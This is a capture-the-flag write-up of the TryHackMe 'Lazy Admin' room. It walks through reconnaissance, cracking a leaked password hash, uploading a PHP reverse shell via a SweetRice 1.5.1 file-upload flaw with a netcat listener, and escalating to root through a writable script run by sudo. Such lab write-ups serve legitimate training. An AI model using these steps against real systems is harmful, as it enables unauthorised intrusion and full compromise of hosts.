Lazy Admin THM

IP

10.10.109.129

Nmap inital scan

sudo nmap -sV -sC -A -oA nmap_inital 10.10.109.129

Nmap full scan

nmap -p- -T5 10.10.109.129

Ports

22:SSH

80:HTTP

  • Most likely Apache2's default page

Port 80 Apache 2.4.18

When we navigate to http://10.10.109.129:80 we are greeted with the following.

  • This of itself is an information disclosure, we now know for sure we are dealing with a Ubuntu host.

Let's perform some directory busting and see if we can find anything interesting

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.109.129:80 -o dirs.txt

Within our results, we find a 

http://10.10.109.129/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql

when we download the MySQL backup file we can find a password hash.

cat mysql_bakup_20191129023059-1.5.1.sql | grep pass

we can take this hash to https://crackstation.net/, we now have a password 

Password123

Lets see if we can SSH into the target

  • It didntDidnt work

ssh admin@10.10.109.129

Back to our ferox results we do find a 

http://10.10.109.129/content/

  • seems like a website management system, it does mention a dashboard

back in our directory results we also find

http://10.10.109.129/content/as/

we can use our creds we found earlier

manager: Password123

we are bought to sweet rice's dashboard.

  • we do have the sweet rice version 1.5.1

having a quick google we can find this version is vulnerable to Arbitrary File Upload we can refer to the following

https://www.exploit-db.com/exploits/40716

if we look at wappalyzer we can tell sweet rice uses PHP, meaning we can upload a PHP reverse shell and hopefully get shell on the system

For this, we can use pentest monkey's php reverse shell

Logophp-reverse-shell/php-reverse-shell.php at master ยท pentestmonkey/php-reverse-shellGitHub

we can use wget and download the file

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

then we need to modify the script slightly

Let's start a Netcat listener 

nc -lvnp 9005

we also need to change the php extention from .php to .php5 for the exploit to take effect

mv php-reverse-shell.php rev.php5

Now lets upload the file

within the Post -> create

we want to add a file

Now we can upload the file

when we navigate to 

http://10.10.109.129/content/attachment/

we will see our rev.php5 file sitting in the dictionary

when we click on the file, we should receive a call back from the target and establish a reverse shell.

Privilege Escalation via www-data

Lets stabilize our shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

first thing let's check our privileges

sudo -l

We can run Perl as sudo with no password on a specific file

backup.pl let's read the script and get a better idea of what it does

cat backup.pl

  • it looks like the script is using sh to execute another script

as you can see we have the write permission set meaning we can alter the file.

well simply edit the file and tell it to run bash

echo "/bin/bash" > /etc/copy.sh

now when we run 

sudo /usr/bin/perl /home/itguy/backup.pl

we have a root shell

PreviousTomghost THMNextAnonymous THM

Last updated